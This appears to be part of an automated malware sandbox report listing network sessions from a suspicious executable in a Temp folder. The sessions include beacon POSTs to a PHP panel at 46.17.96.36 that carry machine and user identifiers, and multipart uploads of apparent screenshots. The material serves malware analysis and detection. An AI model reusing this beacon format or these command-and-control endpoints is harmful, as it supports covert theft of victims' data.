                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:47.816660881 CEST9827OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:47.816726923 CEST9843OUTData Raw: de af 27 b1 1f f1 3a b4 ff 00 ae cb fc e8 cb 9f fb 1b f9 9d 78 fd 31 bf 71 ea 3e 2b ff 00 90 84 7f f5 cc 57 3a c3 9e 2b a3 f1 59 c6 a1 1f fd 73 ae 70 9e 6a 30 7f c1 46 38 ff 00 e3 c8 6e 29 7a 51 45 75 9c 03 b3 4e 18 a6 01 4e 02 a5 96 87 8a 5c d3
                                        Data Ascii: ':x1q>+W:+Yspj0F8n)zQEuNN\E-"fi*Yhpf)f"ARbr*EJ)TSSrKIZ)F2ep`T3D; se\B^_yMEMJ=+EP)hZb"@iiE
                                        Aug 29, 2021 22:27:47.816751003 CEST9848OUTData Raw: a0 ec f9 5e bf f6 fc cc e5 f1 9f 86 ed e0 85 56 ec c7 19 dc ab 18 b5 94 18 c2 05 2d b9 76 e5 00 0c a7 2c 00 c1 15 7e cf c4 3a 66 a1 a9 4d 61 69 3b cd 3c 3f 7c ac 0f e5 8e 01 c7 99 b7 61 38 60 78 3d eb 97 b8 f0 6d f5 b5 cd ad ce 99 73 14 f7 06 19
                                        Data Ascii: ^V-v,~:fMai;<?|a8`x=msBYW(~^?7%5uXTL<h'<9rr_?i<~cS+;v_-(Z{zh5vyVB'%\QL4)EBT!RdP)
                                        Aug 29, 2021 22:27:47.923269033 CEST9876INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        105192.168.2.44984346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.769835949 CEST9778OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:47.845710993 CEST9854INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        106192.168.2.44984446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.991497040 CEST9877OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:48.077568054 CEST9877INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:48.179789066 CEST9877OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:48.179876089 CEST9878OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:48.180069923 CEST9888OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:48.180527925 CEST9890OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:48.214982986 CEST9893OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:48.215234041 CEST9904OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:48.215262890 CEST9912OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:48.215305090 CEST9915OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:27:48.215468884 CEST9917OUTData Raw: 79 27 f7 e9 ff 00 0c 3b 51 fb ff 00 2f eb 53 4a d7 4c f0 e5 d2 68 30 38 d5 22 9b 5c f3 3c 9b 8f 3e 36 48 0f 9c f1 c6 1a 3f 2c 16 fb ab 92 1c 75 24 0e d4 cb af 0f 25 97 84 6d 35 23 a2 eb 37 33 4b 14 c6 7b b8 64 1f 66 b6 74 99 e3 c3 01 11 fe e8 3f
                                        Data Ascii: y';Q/SJLh08"\<>6H?,u$%m5#73K{dft?|uv"DZB:Cdi4[2J dr4.H2Fd4&q>;^.5xWE}m,K]r.wY"5i;\X[o1d:;mcqp
                                        Aug 29, 2021 22:27:48.250401974 CEST9931OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:48.250571012 CEST9947OUTData Raw: f4 30 5a ff 00 df 86 ff 00 1a ab 79 f0 27 55 b5 88 14 d6 ad a6 91 c9 58 d0 42 c3 73 05 2d 8c 93 c7 dd af 6f ff 00 84 93 42 ff 00 a0 d6 9d ff 00 81 49 fe 35 4f 50 d7 b4 a9 12 06 b6 d5 f4 b7 92 29 77 ed 7b d4 50 46 d6 5e bc fa fa 54 f3 57 ec fe e2
                                        Data Ascii: 0Zy'UXBs-oBI5OP)w{PF^TWCl"xn"m9^C2,sV<ge8(O5[WvM5hZ(5hIadK7szY9Q h4s0Dhapi}P(
                                        Aug 29, 2021 22:27:48.361004114 CEST9990INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        107192.168.2.44984546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:48.238157988 CEST9918OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:48.314148903 CEST9989INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        108192.168.2.44984646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:48.456253052 CEST9991OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:48.532093048 CEST9991INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:48.570302963 CEST9991OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:48.570383072 CEST9991OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:48.570595980 CEST10001OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:48.570708990 CEST10004OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:48.605433941 CEST10020OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:48.605484009 CEST10025OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:48.605494976 CEST10031OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:27:48.639698029 CEST10052OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:27:48.640034914 CEST10068OUTData Raw: 69 5a 00 c5 3b 14 98 a2 c3 b8 a2 97 14 0a 76 29 89 88 29 71 cd 18 a7 77 a6 48 80 53 80 cd 25 38 55 22 58 84 52 62 9e 45 25 0c 06 e2 96 97 14 b8 a6 02 01 4e 14 01 4b 40 98 52 1a 75 03 93 4c 40 a2 a4 51 4d a9 07 02 ad 22 1b 1a d4 ca 94 8e 2a 32 28
                                        Data Ascii: iZ;v))qwHS%8U"XRbE%NK@RuL@QM"*2(` RB(R<V4Q@$QNHD)jKERJM6u cih)i)GZsKLAP(:)ANpLuE!1hP#c6z7s5Q}Ma
                                        Aug 29, 2021 22:27:48.643316031 CEST10081OUTData Raw: 4a 33 4c 43 85 3a 98 0d 2e 69 8a c4 82 96 98 0d 38 1a ab 93 61 c2 9d 9a 8c 1a 5c d3 b9 36 24 06 97 35 1e 68 cd 3b 8a c4 bb a8 dd 51 6e a3 75 3e 60 e5 26 0d 46 ea 84 1a 70 34 f9 85 ca 4c 1a 8d de f5 0e 69 73 4f 98 5c a4 bb a8 2d 51 66 8d d4 b9 83
                                        Data Ascii: J3LC:.i8a\6$5h;Qnu>`&Fp4LisO\-QfuPK3Q<uqX~hGK3QyPi2hBhWO\*!J)M.j<4`4iiZb$Gp5I(<SZ)A!Z*<6E&ii)NKxL-Rh
                                        Aug 29, 2021 22:27:48.643383980 CEST10084OUTData Raw: 2b 3a df c3 f3 c5 12 a4 fe 21 d6 2e b6 c9 1b ab 48 f1 21 01 18 36 df dd c6 bb 83 63 0d bb 24 8e e3 26 85 be a0 f6 33 2f 35 9d 46 d3 c2 ac 5a e0 ff 00 69 5a 6a 16 f6 73 ca 51 7e 70 67 8d 4b 63 18 1b e3 70 78 1c 6e e3 18 a7 ea be 27 6d 13 c4 7a 82
                                        Data Ascii: +:!.H!6c$&3/5FZiZjsQ~pgKcpxn'mz%0eH8Q0xvQDIV#r81x\uFK-Kp|/o-4t?_-W_YjQKmw<k,5n9<G-a!|\0B(
                                        Aug 29, 2021 22:27:48.749947071 CEST10103INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        109192.168.2.44984746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:48.691605091 CEST10102OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:48.786235094 CEST10103INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        11192.168.2.44974646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:13.510036945 CEST2205OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:13.510320902 CEST2205OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:13.510593891 CEST2215OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:13.510714054 CEST2218OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:13.542604923 CEST2220OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:13.542634964 CEST2226OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:13.542697906 CEST2228OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:13.542951107 CEST2243OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:13.574920893 CEST2246OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
